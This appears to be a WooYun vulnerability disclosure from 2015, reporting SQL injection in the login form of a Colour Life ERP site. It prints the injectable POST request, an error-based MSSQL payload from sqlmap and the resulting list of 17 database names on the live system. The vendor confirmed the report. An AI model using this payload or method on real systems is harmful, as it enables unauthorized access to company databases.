Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0154444

Title: SQL injection at a Colour Life (彩生活) endpoint (17 databases, DBA privileges)

Vendor: colourlife.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-11-21 16:18

Fix time: 2016-01-11 15:32

Publication time: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-11-21: Details sent to the vendor, awaiting vendor handling
2015-11-21: Vendor confirmed; details disclosed to the vendor only
2015-12-01: Details disclosed to core white hats and experts in related fields
2015-12-11: Details disclosed to regular white hats
2015-12-21: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

2333

Detailed description:

POST request:

POST /default.aspx HTTP/1.1
Host: erp.colourlife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://erp.colourlife.com/default.aspx
Cookie: WebsiteSession=34vhouchcoh77ce9masmq6ohg1; customer_user_agent=74896920; ASP.NET_SessionId=vhqgba55hs4te155t1h3hyra
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
RkTc_userid=admin*&RkTc_userpassword=admin&RkTc_FormEvents_ActionMode=&RkTc_FormEvents_ActionCmd=Login&RkTc_FormEvents_ActionTag=Login&RkTc_FormEvents_ActionSrcTag=&RkTc_FormEvents_ActionNextTag=Logout&RkTc_FormEvents_ActionNextMode=


The RkTc_userid parameter is injectable.

[Screenshots 0.png, 1.png, 2.png and 3.png are not included in the text]


It's late and I need to sleep, so I won't dig deeper here.

Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: RkTc_userid=admin' AND 9569=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9569=9569) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND 'wPdu'='wPdu&RkTc_userpassword=admin&RkTc_FormEvents_ActionMode=&RkTc_FormEvents_ActionCmd=Login&RkTc_FormEvents_ActionTag=Login&RkTc_FormEvents_ActionSrcTag=&RkTc_FormEvents_ActionNextTag=Logout&RkTc_FormEvents_ActionNextMode=
---
[00:36:24] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:36:24] [INFO] testing Microsoft SQL Server
[00:36:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:33] [INFO] confirming Microsoft SQL Server
[00:36:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[00:36:50] [INFO] fetching database names
[00:36:53] [INFO] the SQL query used returns 17 entries
[00:36:54] [INFO] retrieved: ColourLifeData
[00:36:55] [INFO] retrieved: ColourLifeHR
[00:36:57] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:36:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:01] [INFO] retrieved: ColourlifeIntegral
[00:37:03] [INFO] retrieved: ColourLifeMain
[00:37:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:08] [INFO] retrieved: ColourLifeMobile
[00:37:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:17] [INFO] retrieved: ColourLifeShare
[00:37:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[00:37:21] [INFO] retrieved: distribution
[00:37:22] [INFO] retrieved: E_Clean
[00:37:24] [INFO] retrieved: E_Maintenance
[00:37:25] [INFO] retrieved: E_Partner
[00:37:26] [INFO] retrieved: hynoadb
[00:37:27] [INFO] retrieved: master
[00:37:27] [INFO] retrieved: model
[00:37:28] [INFO] retrieved: msdb
[00:37:29] [INFO] retrieved: ReportServer$COLOURLIFEDB
[00:37:29] [INFO] retrieved: ReportServer$COLOURLIFEDBTempDB
[00:37:30] [INFO] retrieved: tempdb
available databases [17]:
[*] ColourLifeData
[*] ColourLifeHR
[*] ColourlifeIntegral
[*] ColourLifeMain
[*] ColourLifeMobile
[*] ColourLifeShare
[*] distribution
[*] E_Clean
[*] E_Maintenance
[*] E_Partner
[*] hynoadb
[*] master
[*] model
[*] msdb
[*] ReportServer$COLOURLIFEDB
[*] ReportServer$COLOURLIFEDBTempDB
[*] tempdb
[00:37:30] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\erp.colourlife.com'
[*] shutting down at 00:37:30

Fix:

Copyright notice: when reposting, credit the source 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-11-21 16:46

Vendor reply:

Thanks

Latest status:

None